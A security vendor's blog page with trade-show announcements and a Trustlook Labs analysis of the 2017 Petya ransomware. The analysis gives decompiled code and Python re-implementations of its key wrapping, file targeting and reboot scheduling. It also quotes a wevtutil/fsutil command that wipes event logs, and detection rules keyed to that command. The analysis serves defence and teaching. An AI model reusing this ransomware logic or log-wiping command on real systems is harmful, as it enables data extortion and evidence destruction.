Trustlook to Demonstrate Enhanced Ransomware Security at Black Hat

Trustlook, the leading provider of cyber security solutions powered by artificial intelligence, will demonstrate its ransomware detection technology at Black Hat between July 26-27, 2017 at the Mandalay Bay Convention Center in Las Vegas. Ransomware has been identified as the biggest cyber threat of 2017 by the U.S. Department of Justice, and is expected to cost businesses and individuals millions in the coming years.

Trustlook’s ransomware detection rates are consistently over 99%, with extremely low false positives. The company’s proprietary AI engine learns and adapts in order to block new ransomware threats before files and data are encrypted. It processes dozens of files per second, without weighing down the network.

“Our goal is to stop ransomware before it becomes a problem,” said Allan Zhang, co-founder and CEO of Trustlook. “If files and data become encrypted, it’s usually too late to do anything.”

Trustlook’s ransomware detection is built into its SECUREai Core platform. SECUREai Core provides an additional layer of protection for network appliance makers and cloud service providers. Using industry-leading, artificial-intelligence powered scanning of traffic, files, and applications, Trustlook SECUREai Core protects against viruses, trojans, and spyware, in addition to ransomware. Threats are blocked in real-time, eliminating the cost and disruption associated with tackling threats after they’ve already penetrated the network.

“Artificial intelligence is a game changer for cyber security,” said Zhang. “It is nearly impossible for human researchers today to keep up with the rapidly changing threat landscape. Machine learning is the great equalizer to help the good guys stay ahead and take control.”

To see a demo of Trustlook’s ransomware solution, or to learn more about the company’s security solutions for mobile devices and the IoT, please visit booth IC51 on the second floor at Black Hat.

Thank you for visiting us at IoT Expo Las Vegas

Trustlook would like to express thanks to everyone who visited our booth at this week’s IoT Expo Conference at Caesar’s Palace in Las Vegas. It was a terrific show, and we were thrilled to be able to showcase the IoT security solution that the engineering team at Trustlook has been developing for over a year.

Our robot arm demonstration received a lot of interest and attention at the show. The purpose of the demo was to illustrate how our host-based security solution, SECUREai IoT, can protect industrial IoT devices such as robots or other factory floor equipment.

If you are interested in learning more about our IoT Security solution, please contact us at bd@trustlook.com.


Trustlook to Exhibit at Black Hat 2017 in Las Vegas

Trustlook is excited to once again be exhibiting at the Black Hat cybersecurity show at the Mandalay Bay Convention Center in Las Vegas from July 26-27, 2017. We are looking forward to showcasing our latest SECUREai artificial intelligence security products. Please stop by Trustlook’s booth in Innovation City on the second floor to see a demonstration of our ransomware solution, as well as learn more about our network security, mobile, and IoT security solutions.

Trustlook SECUREai revolutionizes cybersecurity with a suite of embeddable engines built on artificial intelligence technology that prevent and detect even the most difficult malware, across multiple platforms. Technology companies select Trustlook SECUREai for its high performance, customization capability, and ease of integration.

[Picture: Trustlook at Black Hat 2016]

“Petya” ransomware inspired by “WannaCry” hits European countries

Trustlook Labs has analysed a new, fast-spreading ransomware attack named “Petya”. The attack first struck organizations in Ukraine, knocking government agencies, banks, power utilities and other public services offline, and then spread rapidly to other countries. To propagate, the malware exploits the same Windows SMB remote code execution vulnerability used by “WannaCry”, identified as CVE-2017-0145 and addressed by Microsoft in the MS17-010 update, using the publicly available “EternalBlue” exploit released by the hacker group The Shadow Brokers.

The vulnerability exists in unpatched versions of current Windows operating systems, as well as in unsupported versions such as Windows XP, Windows Server 2003 and Windows 8, for which Microsoft issued out-of-band patches after WannaCry.

The malware’s primary purpose is to encrypt the user’s presumably important files and then demand a ransom for decrypting them. The main functionality is implemented in a Windows DLL. The malicious module is presumably loaded on the target system after exploitation. It exports a single function, by ordinal only and without a name, which IDA auto-names perfc_1 after the module.

perfc_1 takes four parameters. The third is a string that is parsed as command line arguments, and the first of those parsed arguments is taken as a timeout value, in minutes, that governs several of the later operations (the reboot delay and the wait before the ransom note is written).

On execution, the malware tries to enable the privileges SeShutdownPrivilege, SeDebugPrivilege and SeTcbPrivilege in its token with AdjustTokenPrivileges, recording which ones succeeded in a bit mask. If SeDebugPrivilege is granted, the malware overwrites the Master Boot Record (MBR) with its own boot-stage code; a fake CHKDSK screen is then shown when the system reboots.


    // Each granted privilege sets one bit of Privilege_flag:
    //   1 = SeShutdownPrivilege, 2 = SeDebugPrivilege, 4 = SeTcbPrivilege.
    // The scheduled-task code below tests bit 4 (dword_1001F144 & 4), which is
    // presumably the same global.
    if ( AdjustTokenPriv(L"SeShutdownPrivilege") )
      flag = 1;
    if ( AdjustTokenPriv(L"SeDebugPrivilege") )
      flag |= 2u;
    if ( AdjustTokenPriv(L"SeTcbPrivilege") )
      flag |= 4u;
    Privilege_flag = flag;

Then the malware creates a scheduled task that forces a reboot when the timeout expires (the listing clamps the timeout to at least 10 minutes; in the samples observed the delay is between 10 and 60 minutes). Where schtasks is available the task is created with an empty name (/TN "") and, if SeTcbPrivilege was obtained, runs as SYSTEM; otherwise the legacy at command is used. The following code demonstrates the behavior:

int schedule_reboot()
{
...

  v0 = 0;
  GetLocalTime(&SystemTime);
  v1 = waitingTime();                 // timeout in minutes taken from the command line
  if ( v1 < 0xA )
    v1 = 10;                          // never less than 10 minutes
  // Start time = now + timeout + 3 minutes. The hour wraps modulo 24, but the
  // minute field is not reduced modulo 60 and can exceed 59 late in the hour.
  v2 = (v1 + 3) % 0x3C + SystemTime.wMinute;
  v3 = ((v1 + 3) / 0x3C + SystemTime.wHour) % 0x18;
  // Buffer = "<system directory>\shutdown.exe /r /f" (forced reboot)
  if ( GetSystemDirectoryW(&Buffer, 0x30Cu) && PathAppendW(&Buffer, L"shutdown.exe /r /f") )
  {
    if ( sub_10008494() )             // presumably: can schtasks be used on this system?
    {
      v4 = L"/RU \"SYSTEM\" ";        // run the task as SYSTEM only if SeTcbPrivilege was granted
      if ( !(dword_1001F144 & 4) )
        v4 = (const wchar_t *)&unk_10014388;   // otherwise presumably an empty string
      wsprintfW(&v6, L"schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d", v4, &Buffer, v3, v2);
    }
    else
    {
      wsprintfW(&v6, L"at %02d:%02d %ws", v3, v2, &Buffer);   // legacy fallback
    }
    v7 = 0;
    v0 = shellExecute((int)&v6, 0);
  }
  return v0;
}
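The arithmetic above is easy to misread, so here it is re-expressed in Python. This is an added illustration written for this page, not code from the sample or from Trustlook; it assumes the system directory is C:\Windows\system32 and that unk_10014388 is an empty string (the decompiler does not show its contents). schedule_time() mirrors v1, v2 and v3 line for line, reboot_command() formats the two command lines the listing builds, and invalid_start_minutes() enumerates the local-clock minutes for which the listing emits a minute field of 60 or more, which is not a value schtasks or at will accept as a start time.

```python
from __future__ import annotations

# Bits of Privilege_flag as the decompiled perfc_1 sets them.
PRIV_SHUTDOWN, PRIV_DEBUG, PRIV_TCB = 1, 2, 4

# Assumption: GetSystemDirectoryW() returned the usual system directory.
SHUTDOWN_CMD = r"C:\Windows\system32\shutdown.exe /r /f"


def schedule_time(timeout_min: int, hour: int, minute: int) -> tuple[int, int]:
    """Mirror v1, v2 and v3 in schedule_reboot(): the /ST hour and minute.

    The timeout is clamped to a minimum of 10, three minutes of slack are
    added, and the sum is split over the hour and minute fields. The hour
    wraps modulo 24 but the minute field is never reduced modulo 60.
    """
    if timeout_min < 10:                     # if ( v1 < 0xA ) v1 = 10;
        timeout_min = 10
    delay = timeout_min + 3
    st_minute = delay % 60 + minute          # v2
    st_hour = (delay // 60 + hour) % 24      # v3
    return st_hour, st_minute


def reboot_command(timeout_min: int, hour: int, minute: int,
                   priv_flags: int, have_schtasks: bool = True) -> str:
    """Format the command line the listing hands to ShellExecute."""
    st_hour, st_minute = schedule_time(timeout_min, hour, minute)
    if have_schtasks:                        # sub_10008494() returned non-zero
        # unk_10014388 is assumed to be an empty string.
        run_as = '/RU "SYSTEM" ' if priv_flags & PRIV_TCB else ""
        return (f'schtasks {run_as}/Create /SC once /TN "" '
                f'/TR "{SHUTDOWN_CMD}" /ST {st_hour:02d}:{st_minute:02d}')
    return f"at {st_hour:02d}:{st_minute:02d} {SHUTDOWN_CMD}"


def is_valid_start_time(hour: int, minute: int) -> bool:
    """schtasks /ST and at both expect HH:mm with mm in 0..59."""
    return 0 <= hour < 24 and 0 <= minute < 60


def invalid_start_minutes(timeout_min: int) -> list[int]:
    """Local-clock minutes (0..59) for which the listing emits mm >= 60."""
    return [m for m in range(60)
            if not is_valid_start_time(*schedule_time(timeout_min, 12, m))]


if __name__ == "__main__":
    print(reboot_command(60, 23, 50, PRIV_SHUTDOWN | PRIV_DEBUG | PRIV_TCB))
    print(reboot_command(10, 14, 55, PRIV_SHUTDOWN))   # minute field 68: not a time
    print(invalid_start_minutes(60))                     # [57, 58, 59]
```

With the default 60-minute timeout, three of every sixty local-clock minutes produce an unusable start time; with the 10-minute minimum it is thirteen of sixty. That is a property of the listing as decompiled, not a claim about how often the task creation failed in the field.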

After setting up the scheduled reboot, the malware starts encrypting files with specific extensions. It uses the Microsoft Cryptography API (CryptoAPI) to generate a random, exportable AES-128 session key (ALG_ID 0x660E is CALG_AES_128; the flag 1 is CRYPT_EXPORTABLE) and configures it for CBC mode with PKCS#5 padding (KP_MODE = 4 set to CRYPT_MODE_CBC = 1, and KP_PADDING = 3 set to PKCS5_PADDING = 1). This symmetric key, not a key pair, is what encrypts the files:


// Generate encryption key
  v1 = (HCRYPTKEY *)(a1 + 20);        // the session key handle lives at a1+20; hProv at a1+8
  // 0x660E = CALG_AES_128, 1u = CRYPT_EXPORTABLE (needed for CryptExportKey later)
  v5 = CryptGenKey(*(_DWORD *)(a1 + 8), 0x660Eu, 1u, (HCRYPTKEY *)(a1 + 20));
  if ( v5 )
  {
    v2 = *v1;
    *(_DWORD *)pbData = 1;            // CRYPT_MODE_CBC
    CryptSetKeyParam(v2, 4u, pbData, 0);   // KP_MODE
    v3 = *v1;
    *(_DWORD *)v6 = 1;                // PKCS5_PADDING
    CryptSetKeyParam(v3, 3u, v6, 0);       // KP_PADDING
  }
  return v5;

The malware then imports the attacker’s RSA public key from a hard-coded base64 string. The decoded blob is a PKCS#1 RSAPublicKey structure for a 2048-bit key with public exponent 65537. The flag 1 passed to CryptStringToBinaryW is CRYPT_STRING_BASE64, and the 0x13 passed to CryptDecodeObjectEx is RSA_CSP_PUBLICKEYBLOB, which converts the DER structure into the CryptoAPI PUBLICKEYBLOB that CryptImportKey accepts.


// Import public key
      // Hard-coded base64 of a PKCS#1 RSAPublicKey (2048-bit modulus, e = 65537).
      // 1u = CRYPT_STRING_BASE64: decode the text into DER at v2.
      if ( CryptStringToBinaryW(
             L"MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iD"
"qmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+C"
"XsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJY"
"CeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB",
             0,
             1u,
             (BYTE *)v2,
             &pcbBinary,
             0,
             0) )
      {
        pcbStructInfo = 0;
        // 0x10001 = X509_ASN_ENCODING | PKCS_7_ASN_ENCODING; 0x13 = RSA_CSP_PUBLICKEYBLOB.
        // First call sizes the output, second call decodes into a CryptoAPI PUBLICKEYBLOB.
        if ( CryptDecodeObjectEx(0x10001u, (LPCSTR)0x13, v2, pcbBinary, 0, 0, 0, &pcbStructInfo) )
        {
          v3 = (BYTE *)LocalAlloc(0x40u, pcbStructInfo);   // 0x40 = LMEM_ZEROINIT
          pbData = v3;
          if ( v3 )
          {
            if ( CryptDecodeObjectEx(0x10001u, (LPCSTR)0x13, v2, pcbBinary, 0, 0, v3, &pcbStructInfo) )
              // hProv at a1+8; the imported RSA public key handle is stored at a1+12
              v5 = CryptImportKey(*(_DWORD *)(a1 + 8), pbData, pcbStructInfo, 0, 0, (HCRYPTKEY *)(a1 + 12));
            LocalFree(pbData);
          }

This RSA public key is used to wrap the AES session key generated earlier: CryptExportKey with blob type 1 (SIMPLEBLOB) encrypts the session key under the RSA public key, and the result is base64-encoded with CryptBinaryToStringW (again CRYPT_STRING_BASE64). The encoded blob is what appears in the ransom note as the “personal installation key”. The victim is asked to send it to the attacker, who alone holds the matching RSA private key and so is the only party able to recover the session key from it.


// Export encrypted encryption key
  // v3 / *(v1+20): the AES session key; v2 / *(v1+12): the attacker's RSA public key.
  // Blob type 1u = SIMPLEBLOB: the session key is RSA-encrypted under the public key.
  // The first call only sizes the blob, the second fills it.
  if ( CryptExportKey(v3, v2, 1u, 0, 0, &pdwDataLen) )
  {
    v4 = (BYTE *)LocalAlloc(0x40u, pdwDataLen);   // 0x40 = LMEM_ZEROINIT
    pbBinary = v4;
    if ( v4 )
    {
      if ( CryptExportKey(*(_DWORD *)(v1 + 20), *(_DWORD *)(v1 + 12), 1u, 0, v4, &pdwDataLen) )
      {
        pcchString = 0;
        // 1u = CRYPT_STRING_BASE64: size, then encode; the text becomes the "installation key"
        if ( CryptBinaryToStringW(pbBinary, pdwDataLen, 1u, 0, &pcchString) )
        {
          v5 = LocalAlloc(0x40u, 2 * pcchString);   // UTF-16 output, 2 bytes per character
          if ( v5 )
          {
            if ( CryptBinaryToStringW(pbBinary, pdwDataLen, 1u, (LPWSTR)v5, &pcchString) )
              v7 = v5;
            else
              LocalFree(v5);
          }
        }
      }
      LocalFree(pbBinary);
    }
  }
  return v7;
}
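To make the key handling in the three listings above concrete (session key generation, public key import, and the SIMPLEBLOB export), the following Python is an added example written for this page; it is not the sample’s code, not a Trustlook tool, and does not use CryptoAPI. It decodes the hard-coded base64 string from the listing with a minimal DER parser in place of CryptDecodeObjectEx, then wraps a random 16-byte session key under that public key with RSAES-PKCS1-v1_5, the padding CryptExportKey applies for a SIMPLEBLOB. The real blob additionally carries a 12-byte CryptoAPI header and stores the RSA output in little-endian byte order; that framing is omitted here. Only the holder of the matching private key can reverse wrap_session_key(), which is why the installation key in the note is useless to anyone who cannot reach the attacker.

```python
from __future__ import annotations

import base64
import os

# The base64 blob hard-coded in the sample, copied from the listing above.
PETYA_PUBKEY_B64 = (
    "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iD"
    "qmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+C"
    "XsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJY"
    "CeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB"
)


def _der_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Parse one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_pkcs1_rsa_public_key(b64: str) -> tuple[int, int]:
    """Decode a PKCS#1 RSAPublicKey: SEQUENCE { INTEGER n, INTEGER e }.

    This is the structure the listing feeds to CryptDecodeObjectEx with
    RSA_CSP_PUBLICKEYBLOB; here it is parsed directly.
    """
    der = base64.b64decode(b64)           # CryptStringToBinaryW(CRYPT_STRING_BASE64)
    tag, seq, _ = _der_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    tag_n, n_bytes, pos = _der_tlv(seq, 0)
    tag_e, e_bytes, _ = _der_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02:
        raise ValueError("expected two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def wrap_session_key(session_key: bytes, n: int, e: int) -> bytes:
    """RSAES-PKCS1-v1_5 encryption of a session key under (n, e).

    EM = 0x00 || 0x02 || PS || 0x00 || M, with PS random and non-zero; the
    random PS is why two exports of the same key produce different blobs.
    """
    k = (n.bit_length() + 7) // 8         # 256 bytes for a 2048-bit modulus
    ps_len = k - 3 - len(session_key)
    if ps_len < 8:
        raise ValueError("session key too long for this modulus")
    ps = bytearray()
    while len(ps) < ps_len:
        ps += bytes(b for b in os.urandom(ps_len - len(ps)) if b != 0)
    em = b"\x00\x02" + bytes(ps) + b"\x00" + session_key
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")


def make_installation_key(n: int, e: int) -> str:
    """Mimic the listing's flow: random AES-128 key, RSA-wrap it, base64 it."""
    aes_key = os.urandom(16)              # stands in for CryptGenKey(CALG_AES_128)
    return base64.b64encode(wrap_session_key(aes_key, n, e)).decode()


if __name__ == "__main__":
    n, e = parse_pkcs1_rsa_public_key(PETYA_PUBKEY_B64)
    print(n.bit_length(), e)              # 2048 65537
    print(make_installation_key(n, e)[:32] + "...")
```

The parser is deliberately minimal (it handles only the two-integer SEQUENCE this key uses) and would need a full ASN.1 library for anything else; the point is to show that everything needed to produce an installation key is public, while nothing needed to open one is.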

After exporting the wrapped session key, the malware begins the actual file encryption. It enumerates the fixed logical drives on the system and searches them for files with the following hard-coded extensions:

.3ds, .7z, .accdb, .ai, .asp, .aspx, .avhd, .back, .bak, .c, .cfg, .conf, .cpp, .cs, .ctl, .dbf, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .kdbx, .mail, .mdb, .msg, .nrg, .ora, .ost, .ova, .ovf, .pdf, .php, .pmf, .ppt, .pptx, .pst, .pvi, .py, .pyc, .rar, .rtf, .sln, .sql, .tar, .vbox, .vbs, .vcb, .vdi, .vfd, .vmc, .vmdk, .vmsd, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xvd, .zip

Directories are walked recursively with a depth limit (the a2 parameter), and entries that are not directories, or that are reparse points, are treated as files. The “C:\Windows” directory is excluded by an inverted StrStrIW test: the candidate directory path is searched for inside the constant string “C:\Windows;”, and any directory whose path is a substring of it is skipped. For every file, the extension is wrapped in dots (“%ws.”) and looked up, case-insensitively, in the dot-delimited extension list, so “.c” matches without also matching “.cfg” or “.cs”. Matching files are handed to the encryption routine:


void __stdcall sub_10001973(LPCWSTR pszDir, int a2, int a3)
{
  void *v3; // eax@4
  DWORD v4; // eax@5
  struct _WIN32_FIND_DATAW *v5; // eax@14
  HANDLE hFindFile; // [sp+Ch] [bp-86Ch]@3
  struct _WIN32_FIND_DATAW FindFileData; // [sp+10h] [bp-868h]@3
  WCHAR FileName; // [sp+260h] [bp-618h]@9
  WCHAR pszDest; // [sp+468h] [bp-410h]@2
  WCHAR v10; // [sp+670h] [bp-208h]@15

  if ( a2 )                                   // a2 = remaining recursion depth
  {
    if ( PathCombineW(&pszDest, pszDir, L"*") )
    {
      hFindFile = FindFirstFileW(&pszDest, &FindFileData);
      if ( hFindFile != (HANDLE)-1 )
      {
   […]
          if ( wcscmp(FindFileData.cFileName, L".")
            && wcscmp(FindFileData.cFileName, L"..")
            && PathCombineW(&FileName, pszDir, FindFileData.cFileName) )
          {
            // Not a directory (FILE_ATTRIBUTE_DIRECTORY = 0x10), or a reparse point
            // (FILE_ATTRIBUTE_REPARSE_POINT = 0x400): treat the entry as a file.
            if ( !(FindFileData.dwFileAttributes & 0x10) || FindFileData.dwFileAttributes & 0x400 )
            {
              v5 = (struct _WIN32_FIND_DATAW *)PathFindExtensionW(FindFileData.cFileName);
              // PathFindExtensionW returns a pointer to the terminating NUL when there is no extension
              if ( (WCHAR *)v5 != &FindFileData.cFileName[wcslen(FindFileData.cFileName)] )
              {
                wsprintfW(&v10, L"%ws.", v5);   // ".ext." so the lookup is bounded on both sides
                // case-insensitive search in the dot-delimited extension list (truncated here)
                if ( StrStrIW(
                       L".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs….",
                       &v10) )
                {
                  sub_1000189A(&FileName, a3);    // encrypt the file
                }
              }
            }
            // Inverted test: skip the directory if its full path is a substring of "C:\Windows;"
            else if ( !StrStrIW(L"C:\\Windows;", &FileName) )
            {
              sub_10001973(&FileName, a2 - 1, a3);   // recurse one level deeper
            }
          }
        }
        while ( FindNextFileW(hFindFile, &FindFileData) );
        FindClose(hFindFile);
      }
    }
  }
}
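The targeting rules in the walk above (the dot-bounded extension match, the recursion budget, and the inverted StrStrIW test for C:\Windows) are re-expressed below in Python as an added example written for this page, run over a constructed in-memory directory tree rather than a real disk. The extension list is the page’s own; the depth values used are arbitrary, since the value the sample passes as a2 is not shown in the listing, and reparse points are not modelled.

```python
from __future__ import annotations

# The page's extension list, stored the way the sample stores it: one
# dot-delimited string, so a lookup of ".c." cannot match ".cfg." or ".cs.".
TARGET_EXTENSIONS = [
    "3ds", "7z", "accdb", "ai", "asp", "aspx", "avhd", "back", "bak", "c", "cfg",
    "conf", "cpp", "cs", "ctl", "dbf", "disk", "djvu", "doc", "docx", "dwg", "eml",
    "fdb", "gz", "h", "hdd", "kdbx", "mail", "mdb", "msg", "nrg", "ora", "ost",
    "ova", "ovf", "pdf", "php", "pmf", "ppt", "pptx", "pst", "pvi", "py", "pyc",
    "rar", "rtf", "sln", "sql", "tar", "vbox", "vbs", "vcb", "vdi", "vfd", "vmc",
    "vmdk", "vmsd", "vmx", "vsdx", "vsv", "work", "xls", "xlsx", "xvd", "zip",
]
EXT_HAYSTACK = "." + ".".join(TARGET_EXTENSIONS) + "."


def is_target_file(filename: str) -> bool:
    """PathFindExtensionW + wsprintfW(L"%ws.") + StrStrIW, in Python."""
    dot = filename.rfind(".")
    if dot == -1:                            # PathFindExtensionW returned the terminating NUL
        return False
    return (filename[dot:] + ".").lower() in EXT_HAYSTACK


def _skipped_directory(full_path: str) -> bool:
    """The sample's inverted test: StrStrIW(L"C:\\Windows;", full_path) != NULL."""
    return full_path.lower() in "c:\\windows;"


def collect_targets(tree: dict, path: str, depth: int) -> list[str]:
    """Walk a constructed tree the way sub_10001973 does and list the files it would encrypt.

    tree maps a name to None for a file or to a nested dict for a directory.
    depth is the recursion budget (a2 in the listing); the sample's value is
    not shown, so the caller chooses it.
    """
    if depth == 0:                               # if ( a2 ) { ... }
        return []
    hits: list[str] = []
    for name, child in tree.items():             # FindFirstFileW / FindNextFileW
        full = path.rstrip("\\") + "\\" + name   # PathCombineW
        if child is None:                        # not a directory: candidate file
            if is_target_file(name):
                hits.append(full)                # sub_1000189A would encrypt it
        elif not _skipped_directory(full):
            hits.extend(collect_targets(child, full, depth - 1))
    return hits


# Constructed sample tree (not a real file system).
SAMPLE_TREE = {
    "Windows": {"System32": {"config.sys": None, "notepad.exe": None, "drivers.c": None}},
    "Users": {
        "alice": {
            "report.DOCX": None,
            "notes.c": None,
            "data.csv": None,
            "Makefile": None,
            "backup.tar.gz": None,
            "deep": {"deeper": {"deepest": {"secrets.kdbx": None}}},
        }
    },
}


if __name__ == "__main__":
    for hit in collect_targets(SAMPLE_TREE, "C:\\", 4):
        print(hit)
```

Two details worth noticing when triaging a hit: a file under C:\Windows is safe even if its extension is listed (drivers.c in the sample tree is never reached), and a deeply nested file is only reached if the recursion budget allows it, so the set of encrypted files depends on the budget the sample was run with as much as on the extension list.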

After encrypting the files, the malware writes a ransom note named README.TXT into the directory it was given. Before writing it, it sleeps for (timeout minus one) minutes, reusing the timeout value that also governs the scheduled reboot.

The following code shows how the note is constructed:


      if ( PathCombineW(&pszDest, pszDir, L"README.TXT") )   // pszDir\README.TXT
      {
        v2 = waitingTime();                  // same timeout (minutes) used for the reboot
        if ( v2 )
          Sleep(60000 * (v2 - 1));           // wait (timeout - 1) minutes before dropping the note
        // 0x40000000 = GENERIC_WRITE, 2u = CREATE_ALWAYS
        v3 = CreateFileW(&pszDest, 0x40000000u, 0, 0, 2u, 0, 0);
        if ( v3 != (HANDLE)-1 )
        {
          NumberOfBytesWritten = 0;
          // Each length is a byte count of the UTF-16 text (2 bytes per character)
          WriteFile(
            v3,
            L"Ooops, your important files are encrypted.\r\n"
             "\r\n"
             "If you see this text, then your files are no longer accessible, because\r\n"
             "they have been encrypted. Perhaps you are busy looking for a way to recover\r\n"
             "your files, but don't waste your time. Nobody can recover your files without\r\n"
             "our decryption service.\r\n"
             "\r\n"
             "We guarantee that you can recover all your files safely and easily.\r\n"
             "All you need to do is submit the payment and purchase the decryption key.\r\n"
             "\r\n"
             "Please follow the instructions:\r\n"
             "\r\n"
             "1.\tSend $300 worth of Bitcoin to following address:\r\n"
             "\r\n",
            0x432u,
            &NumberOfBytesWritten,
            0);
          WriteFile(v3, L"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX\r\n\r\n", 0x4Cu, &NumberOfBytesWritten, 0);
          WriteFile(
            v3,
            L"2.\tSend your Bitcoin wallet ID and personal installation key to e-mail ",
            0x8Eu,
            &NumberOfBytesWritten,
            0);
          WriteFile(v3, L"wowsmith123456@posteo.net.\r\n", 0x38u, &NumberOfBytesWritten, 0);
          WriteFile(v3, L"\tYour personal installation key:\r\n\r\n", 0x48u, &NumberOfBytesWritten, 0);
          // exported_key: the base64 SIMPLEBLOB produced by the export routine above
          WriteFile(v3, exported_key, 2 * wcslen((const unsigned __int16 *)exported_key), &NumberOfBytesWritten, 0);
          CloseHandle(v3);
        }
      }

From the above code we can see that the exported key (the AES session key encrypted under the attacker’s RSA public key) is written into the ransom note under “Your personal installation key:”. The victim is told to send this key by email, together with the Bitcoin wallet ID, after paying $300 worth of Bitcoin.

Finally, the malware covers its tracks by clearing the Setup, System, Security and Application event logs with wevtutil and running fsutil usn against the NTFS USN change journal. The command line as recovered is cut off after “fsutil usn”:

"wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn"
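The scheduled reboot, the wevtutil log clearing and the fsutil usn call all leave process-creation telemetry, and those command lines are a practical hunting signal. The following Python is an added example written for this page, not a Trustlook product and not the sample’s code. It runs three command-line rules over constructed process-creation records modelled loosely on Sysmon Event ID 1 fields; the records are made up for illustration, the third one reproducing the recovered command line exactly, including the cut-off after fsutil usn, which is why the USN rule keys on that prefix rather than on a specific subcommand.

```python
from __future__ import annotations

import re

# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "pid": 4120,
     "cmdline": 'schtasks /RU "SYSTEM" /Create /SC once /TN "" '
                '/TR "C:\\Windows\\system32\\shutdown.exe /r /f" /ST 14:23'},
    {"host": "ws01", "pid": 4188,
     "cmdline": "at 14:23 C:\\Windows\\system32\\shutdown.exe /r /f"},
    {"host": "ws01", "pid": 4200,
     "cmdline": "cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security"
                " & wevtutil cl Application & fsutil usn"},
    {"host": "ws02", "pid": 911,
     "cmdline": 'schtasks /Create /SC daily /TN "Backup" /TR "C:\\backup\\run.cmd" /ST 02:00'},
    {"host": "ws02", "pid": 915,
     "cmdline": "wevtutil qe Security /c:5 /f:text"},
]

# Rule name -> pattern. Each pattern is anchored on a specific artefact the
# listings above produce; plain "shutdown /r" by an admin does not match.
RULES = [
    ("forced_reboot_scheduled",
     re.compile(r"\b(?:schtasks|at)(?:\.exe)?\b[^&|]*shutdown(?:\.exe)?\s+/r\s+/f\b", re.I)),
    ("event_logs_cleared",
     re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+\w+", re.I)),
    ("usn_journal_tampered",
     re.compile(r"\bfsutil(?:\.exe)?\s+usn\b", re.I)),
]
_CLEARED_LOG = re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+(\w+)", re.I)


def classify(cmdline: str) -> list[str]:
    """Return the names of all rules the command line matches."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    # Clearing one log can be routine admin hygiene; several in one command line
    # (four in the sample) is the pattern worth alerting on.
    if "event_logs_cleared" in hits:
        cleared = {m.lower() for m in _CLEARED_LOG.findall(cmdline)}
        if len(cleared) < 2:
            hits.remove("event_logs_cleared")
    return hits


def triage(events: list[dict]) -> list[tuple[str, int, list[str]]]:
    """(host, pid, rule names) for every event that matched at least one rule."""
    return [(ev["host"], ev["pid"], hits)
            for ev in events if (hits := classify(ev["cmdline"]))]


if __name__ == "__main__":
    for host, pid, hits in triage(SAMPLE_EVENTS):
        print(f"{host} pid={pid}: {', '.join(hits)}")
```

In a real deployment the same rules would be fed from 4688 or Sysmon process-creation events, and the reboot rule pairs naturally with a check on the scheduled task store for a task whose name is empty, since that is how the listing creates it.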

When the scheduled time arrives, the task reboots the system. The malicious code written into the MBR then displays a fake CHKDSK progress screen to hide its encryption of the Master File Table (MFT).

Once that stage completes, the ransom note is shown to the infected user.

At the time of this posting, the Bitcoin address in the ransom note has received 3.99 BTC.

However, a test message to the contact address shows that the email provider has disabled the attacker’s account: mail to it is rejected with the 554 response below. Even a victim who paid the ransom therefore has no way to deliver the installation key to the attacker, and the files will not be decrypted.


The response from the remote server was:
554 5.7.1 <wowsmith123456@posteo.net>: Recipient address rejected: Access denied

Sample information:

MD5 71b6a493388e7d0b40c83ce903bc6b04
SHA-1 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA-256 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745

Trustlook to exhibit at IoT Evolution Expo in Las Vegas

Trustlook is excited to be exhibiting at IoT Evolution Expo in Las Vegas from July 17-20, 2017. Please stop by booth #420 in the Caesar’s Palace Ballroom to see a demonstration of Trustlook’s unique IoT security solution.

